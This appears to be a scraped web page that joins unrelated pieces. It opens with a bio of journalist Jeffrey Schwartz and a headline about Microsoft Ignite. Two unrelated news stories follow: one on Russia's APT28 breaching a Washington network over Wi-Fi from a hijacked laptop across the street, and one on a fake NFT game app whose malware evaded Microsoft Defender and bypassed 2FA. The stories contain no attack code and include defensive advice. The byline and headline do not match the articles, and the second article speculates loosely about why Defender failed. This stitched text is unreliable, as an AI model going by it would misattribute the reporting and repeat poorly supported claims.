Jeffrey Schwartz is a journalist who has covered information security and all forms of business and enterprise IT, including client computing, data center and cloud infrastructure, and application development for more than 30 years. Jeff is a regular contributor to Channel Futures. Previously, he was editor-in-chief of Redmond magazine and contributed to its sister titles Redmond Channel Partner, Application Development Trends, and Virtualization Review. Earlier, he held editorial roles with CommunicationsWeek, InternetWeek, and VARBusiness. Jeff is based in the New York City suburb of Long Island.

Microsoft Highlights Security Exposure Management at Ignite

In a first, Russia's APT28 hacking group appears to have remotely breached the Wi-Fi of an espionage target by hijacking a laptop in another building across the street.

For determined hackers, sitting in a car outside a target's building and using radio equipment to breach its Wi-Fi network has long been an effective but risky technique. These risks became all too clear when spies working for Russia's GRU military intelligence agency were caught red-handed on a city street in the Netherlands in 2018 using an antenna hidden in their car's trunk to try to hack into the Wi-Fi of the Organization for the Prohibition of Chemical Weapons.

Since that incident, however, that same unit of Russian military hackers appears to have developed a new and far safer Wi-Fi hacking technique: Instead of venturing into radio range of their target, they found another vulnerable network in a building across the street, remotely hacked into a laptop in that neighboring building, and used that computer's antenna to break into the Wi-Fi network of their intended victim—a radio-hacking trick that never even required leaving Russian soil.

At the Cyberwarcon security conference in Arlington, Virginia, today, cybersecurity researcher Steven Adair will reveal how his firm, Volexity, discovered that unprecedented Wi-Fi hacking technique—what the firm is calling a “nearest neighbor attack"—while investigating a network breach targeting a customer in Washington, DC, in 2022. Volexity, which declined to name its DC customer, has since tied the breach to the Russian hacker group known as Fancy Bear, APT28, or Unit 26165. Part of Russia's GRU military intelligence agency, the group has been involved in notorious cases ranging from the breach of the Democratic National Committee in 2016 to the botched Wi-Fi hacking operation in which four of its members were arrested in the Netherlands in 2018.

In this newly revealed case from early 2022, Volexity ultimately discovered not only that the Russian hackers had jumped to the target network via Wi-Fi from a different compromised network across the street, but also that this prior breach had _also_ potentially been carried out over Wi-Fi from yet another network in the same building—a kind of “daisy-chaining” of network breaches via Wi-Fi, as Adair describes it.

“This is the first case we’ve worked where you have an attacker that’s extremely far away and essentially broke into other organizations in the US in physical proximity to the intended target, then pivoted over Wi-Fi to get into the target network across the street,” says Adair. “That’s a really interesting attack vector that we haven’t seen before.”

A slide describing the “nearest neighbor attack” that Russian hackers used to breach a DC network via Wi-Fi, from the Cyberwarcon presentation of Volexity founder Steven Adair.

Illustration: Volexity

Based on the hackers' targeting of individuals within their customer's network, Adair says that the GRU hackers appear to have been seeking intelligence about Ukraine. It's no coincidence, he says, that the daisy-chained Wi-Fi-based intrusion was carried out in the months just before and after Russia's initial full-scale invasion of Ukraine in February 2022.

Adair argues, though, that the case should serve as a broader warning about cybersecurity threats to Wi-Fi for high-value targets—and not just from the usual suspects loitering in the parking lot or the lobby. “Now we know that a motivated nation-state is doing this and has done it,” says Adair, “It puts on the radar that Wi-Fi security has to be ramped up a good bit.” He suggests organizations that might be the target of similar remote Wi-Fi attacks consider limiting the range of their Wi-Fi, changing the network's name to make it less obvious to potential intruders, or introducing other authentication security measures to limit access to employees.

Adair says that Volexity first began investigating the breach of its DC customer's network in the first months of 2022, when the company saw signs of repeated intrusions into the customer's systems by hackers who had carefully covered their tracks. Volexity's analysts eventually traced the compromise to a hijacked user's account connecting to a Wi-Fi access point in a far end of the building, in a conference room with external-facing windows. Adair says he personally scoured the area looking for the source of that connection. “I went there to physically run down what it could be. We looked at smart TVs, looked for devices in closets. Is someone in the parking lot? Is it a printer?” he says. “We came up dry.”

Only after the next intrusion, when Volexity managed to get more complete logs of the hackers' traffic, did its analysts solve the mystery: The company found that the hijacked machine which the hackers were using to dig around in its customer's systems was leaking the name of the domain on which it was hosted—in fact, the name of another organization just across the road. “At that point, it was 100 percent clear where it was coming from,” Adair says. “It's not a car in the street. It's the building next door.”

With the cooperation of that neighbor, Volexity investigated that second organization's network and found that a certain laptop was the source of the street-jumping Wi-Fi intrusion. The hackers had penetrated that device, which was plugged into a dock connected to the local network via Ethernet, and then switched on its Wi-Fi, allowing it to act as a radio-based relay into the target network. Volexity found that, to break into that target's Wi-Fi, the hackers had used credentials they'd somehow obtained online but had apparently been unable to exploit elsewhere, likely due to two-factor authentication.

Volexity eventually tracked the hackers on that second network to two possible points of intrusion. The hackers appeared to have compromised a VPN appliance owned by the other organization. But they had also broken into the organization's Wi-Fi from _another_ network's devices in the same building, suggesting that the hackers may have daisy-chained as many as three networks via Wi-Fi to reach their final target. “Who knows how many devices or networks they compromised and were doing this on,” says Adair.

In fact, even after Volexity evicted the hackers from their customer's network, the hackers tried again that spring to break in via Wi-Fi, this time attempting to access resources that were shared on the guest Wi-Fi network. “These guys were super persistent,” says Adair. He says that Volexity was able to detect this next breach attempt, however, and quickly lock out the intruders.

Volexity had presumed early on in its investigation that the hackers were Russian in origin due to their targeting of individual staffers at the customer organization focused on Ukraine. Then in April, fully two years after the original intrusion, Microsoft warned of a vulnerability in Windows' print spooler that had been used by Russia's APT28 hacker group—Microsoft refers to the group as Forest Blizzard—to gain administrative privileges on target machines. Remnants left behind on the very first computer Volexity had analyzed in the Wi-Fi-based breach of its customer exactly matched that technique. “It was an exact one-to-one match,” Adair says.

The notion that APT28 would be behind the daisy-chained Wi-Fi hacking makes sense, says John Hultquist, the founder of Cyberwarcon who also leads threat intelligence at Google-owned cybersecurity firm Mandiant and has long tracked the GRU hackers. He sees the technique Volexity uncovered as the natural evolution of APT28's “close-access” hacking methods, in which the GRU has sent small traveling teams in person to hack into target networks via Wi-Fi if other methods failed.

“This is essentially a close-access op like they’ve done in the past, but without the close access,” Hultquist says.

The switch to hacking via Wi-Fi from a remotely compromised device rather than physically placing a spy nearby represents a logical next step following the GRU's operational security disaster in 2018, when its hackers were caught in a car in The Hague attempting to hack the Organization for the Prohibition of Chemical Weapons in response to the OPCW's investigation of the attempted assassination of GRU defector Sergei Skripal. In that incident, the APT28 team was arrested and their devices were seized, revealing their travel around the world from Brazil to Malaysia to carry out similar close-access attacks.

“If a target is important enough, they’re willing to send people in person. But you don’t have to do that if you can come up with an alternative like what we’re seeing here,” Hultquist says. “This is potentially a major improvement for those operations, and it’s something we’ll probably see more of—if we haven’t already.”

Russian Spies Jumped From One Network to Another Via Wi-Fi in an Unprecedented Hack

Malware bypasses Microsoft Defender and 2FA, stealing $24K in cryptocurrency via a fake NFT game app. Learn how…

Malware bypasses Microsoft Defender and 2FA, stealing $24K in cryptocurrency via a fake NFT game app. Learn how it compromised devices and evaded security.

Cybersecurity researchers at SafetyDetectives revealed that Microsoft Defender, the default Windows antivirus, was deceived by malware, enabling the theft of cryptocurrency from an unsuspecting user. The issue was uncovered during the analysis of a seemingly harmless NFT game app, which was actually designed to steal cryptocurrency.

The application also compromised the device by bypassing **Google’s two-factor authentication** and stole over $24,000 in cryptocurrency. According to researchers, the malware, once installed, quietly operates in the background, gathering sensitive information and may even hijack the user’s Google account, which is protected by two-factor authentication (2FA). It achieves this by installing a malicious Chrome extension disguised as Google Keep, bypassing the 2FA security measures.

During the investigation, SafetyDetectives’ team tested Microsoft Defender against the malware-laced app, using Wireshark to monitor network traffic and detect the malware’s location.

Surprisingly, Microsoft Defender failed to stop the virus during its installation and execution, allowing the malware to gain access to system operations, download suspicious files, collect sensitive information, and even determine the user’s location.

The malware was programmed to shut down if the user was in Russia, Ukraine, or Belarus, likely due to its origin. The **fake Chrome extension** enabled the malware to access every website visited, steal login data, and monitor anything copied from the browser. The virus collected everything necessary to remotely control the system, and Microsoft Defender didn’t send an alert.

****Bitdefender and Malwarebytes to the Rescue****

To assess the effectiveness of other antivirus solutions, the team also tested Malwarebytes and Bitdefender. While neither antivirus was able to prevent the initial installation, they did intervene at later stages of the attack. Bitdefender blocked the malware’s attempt to access critical information, while Malwarebytes prevented the installation altogether. 

“While Malwarebytes stopped the breach faster than Bitdefender, neither is inherently better in dealing with this specific malware, as both were able to prevent critical compromise. Bitdefender may even have the benefit of having fewer false positives,” they explained in the **blog post**.

It could be that in recent years, Microsoft Exchange Server has been targeted by a **series** of zero-day vulnerabilities, some of which could have impacted Microsoft Defender’s ability to protect systems. Or supply chain attacks, like the **SolarWinds hack**, can compromise software updates and tools, potentially affecting the integrity of security solutions like Microsoft Defender.

Nevertheless, the investigation emphasizes the importance of investing in stronger antivirus software and exercising caution when downloading and installing applications, especially from unverified sources. Staying informed about cyber threats and taking proactive measures can significantly reduce the risk of malicious attacks.

1.  Microsoft Defender Flags Tor Browser as Malware
2.  Fake ChatGPT Extension Hijacks Facebook Accounts
3.  Malicious Extensions Bypass Google’s MV3 Restrictions
4.  Fake Sites Spread Malware as Malwarebytes, Bitdefender
5.  Phemedrone Exploits Windows Defender SmartScreen Flaw

Tag

#auth